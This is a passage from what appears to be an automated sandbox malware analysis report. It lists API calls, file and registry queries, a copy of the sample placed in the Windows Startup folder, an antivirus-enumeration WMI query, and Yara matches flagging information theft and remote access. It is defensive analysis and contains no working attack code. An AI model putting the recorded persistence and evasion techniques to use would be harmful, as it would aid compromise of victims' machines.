                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,17_2_00C7957F
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,17_2_00C796E3
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,17_2_00C77E83
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,17_2_00C796A7
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,17_2_00C79640
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,17_2_00C7EF8D
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,17_2_00432021
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_0042D026
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,17_2_0042D11B
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,17_2_0042D1C2
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,17_2_0042D21D
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __EH_prolog3,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memset,LocalFree,17_2_0041628C
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,17_2_0042D3EE
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,17_2_0042D4AE
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,17_2_0042D551
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,17_2_0042D515
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,17_2_0042B94F
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,17_2_0042C909
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,17_2_0042CBF7
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,17_2_00422C07
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,17_2_0042BCAD
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoA,17_2_00423EF8
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,17_2_00431F47
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Users\user\Desktop\0XzeMRyE1e.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe; Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe; Code function: 13_2_00413453 cpuid
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe; Code function: 13_2_00413871 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe; Code function: 13_2_004219A1 _free,_free,_free,GetTimeZoneInformation,_free
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe; Code function: 13_2_0040F200 Sleep,IsUserAnAdmin,GetUserNameW,GetComputerNameExW
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe; Code function: 13_2_00405230 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                        Stealing of Sensitive Information

                        Source: Yara match; File source: dump.pcap, type: PCAP
                        Source: Yara match; File source: 0000000D.00000002.509327209.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000D.00000002.509308584.0000000000D40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 17.3.file_22613.exe.d5d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 17.2.file_22613.exe.14a3460.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 17.2.file_22613.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 18.2.file_22613.exe.f840000.1.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 17.2.file_22613.exe.14a3460.2.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000011.00000002.511834005.0000000001477000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: Process Memory Space: file_22613.exe PID: 6624, type: MEMORYSTR
                        Source: Yara match; File source: Process Memory Space: file_22613.exe PID: 6756, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara matchFile source: 17.3.file_22613.exe.d5d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.file_22613.exe.14a3460.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.file_22613.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.file_22613.exe.f840000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.file_22613.exe.14a3460.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.511834005.0000000001477000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file_22613.exe PID: 6624, type: MEMORYSTR
